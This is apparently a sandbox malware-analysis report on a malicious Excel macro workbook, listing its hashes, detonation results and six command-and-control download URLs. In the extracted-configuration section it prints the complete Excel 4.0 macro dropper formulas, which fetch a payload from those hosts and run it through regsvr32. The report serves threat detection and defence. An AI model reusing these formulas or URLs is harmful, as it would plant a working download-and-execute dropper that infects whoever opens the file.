Overview

overview

10

Static

static

10

232a762314...f.xlsm

windows7-x64

10

232a762314...f.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

  • Size

    40KB

  • Sample

    241120-s5q6dsypcs

  • MD5

    30d3ff23cf32a50b15d75fe6c085f048

  • SHA1

    87154e8476118b45c667634196e19205b64b30e9

  • SHA256

    232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

  • SHA512

    f29b661910afb0c685f04bfcc5d52f0ce2734c62bb23cce2ef116832ac55a4cc8c0c3bbfb583c62ef0a0713dcde2e61d917d1cb325faa392a65c11bc58554be1

  • SSDEEP

    768:oPnCsqi1O3mnHzyKfcrND59V+L9Rw4eWrXcTqy0Fy:mnC5iymTylND59V4jwmXc2XFy

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/

http://totalplaytuxtla.com/sitio/tEMOwWRh/

http://meca-global.com/wp-admin/zpM6L8KXY0H/

http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/

http://51.222.72.232/wp-includes/3ztqctcYr/

http://51.222.72.233/wp-includes/Xi60QX9khe/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/","..\xda.ocx",0,0) =IF('EFEGVE'!F12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://totalplaytuxtla.com/sitio/tEMOwWRh/","..\xda.ocx",0,0)) =IF('EFEGVE'!F14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://meca-global.com/wp-admin/zpM6L8KXY0H/","..\xda.ocx",0,0)) =IF('EFEGVE'!F16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ydxinzuo.cn/0gfwjgh/1sodbUEzYzTRyy/","..\xda.ocx",0,0)) =IF('EFEGVE'!F18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.232/wp-includes/3ztqctcYr/","..\xda.ocx",0,0)) =IF('EFEGVE'!F20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://51.222.72.233/wp-includes/Xi60QX9khe/","..\xda.ocx",0,0)) =IF('EFEGVE'!F22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xda.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://moveconnects.com/nvclle7y/pD1vMMFRKS9wasA4E/
xlm40.dropper

http://totalplaytuxtla.com/sitio/tEMOwWRh/
xlm40.dropper

http://meca-global.com/wp-admin/zpM6L8KXY0H/

Targets

    • Target

      232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

    • Size

      40KB

    • MD5

      30d3ff23cf32a50b15d75fe6c085f048

    • SHA1

      87154e8476118b45c667634196e19205b64b30e9

    • SHA256

      232a7623140beefd90a9a7e56b39f54746ef3c446647e8f6f20a08726ea1aa4f

    • SHA512

      f29b661910afb0c685f04bfcc5d52f0ce2734c62bb23cce2ef116832ac55a4cc8c0c3bbfb583c62ef0a0713dcde2e61d917d1cb325faa392a65c11bc58554be1

    • SSDEEP

      768:oPnCsqi1O3mnHzyKfcrND59V+L9Rw4eWrXcTqy0Fy:mnC5iymTylND59V4jwmXc2XFy

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks